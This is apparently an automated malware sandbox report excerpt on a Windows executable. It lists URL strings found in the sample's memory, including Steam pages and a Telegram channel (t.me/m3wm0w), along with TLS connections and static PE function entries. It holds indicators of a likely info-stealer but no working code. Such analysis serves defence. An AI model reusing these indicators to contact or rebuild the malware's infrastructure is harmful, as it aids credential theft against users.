76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://store.steampowered.com/news/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://store.steampowered.com/points/shop/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr | String found in binary or memory: https://store.steampowered.com/stats/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000071E000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/V
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/i
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: https://t.me/m
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000000.2483022637.000000000045C000.00000008.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000077B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000071E000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871345979.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711480146.000000000045C000.00000008.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe.0.drString found in binary or memory: https://t.me/m3wm0w
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000071E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/m3wm0w%
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/m3wm0w(
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/m3wm0w8
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/m3wm0wl
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe.0.drString found in binary or memory: https://t.me/m3wm0wp1up1Mozilla/5.0
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/ows
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: https://telegram.org/img/t_logo_2x.png
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000076D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptchaL
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49778 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49958 version: TLS 1.2

System Summary

Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00401625 NtQueryInformationProcess,NtQueryInformationProcess,15_2_00401625
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00408F1115_2_00408F11
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040CF3115_2_0040CF31
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042CFE115_2_0042CFE1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040CFF115_2_0040CFF1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040F05115_2_0040F051
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041107115_2_00411071
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040900115_2_00409001
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040B03115_2_0040B031
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040B0D115_2_0040B0D1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004090E115_2_004090E1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040D09115_2_0040D091
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041114115_2_00411141
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042D17115_2_0042D171
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043F11115_2_0043F111
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040F12115_2_0040F121
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0044313115_2_00443131
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040F1D115_2_0040F1D1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004431D115_2_004431D1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042B1E115_2_0042B1E1
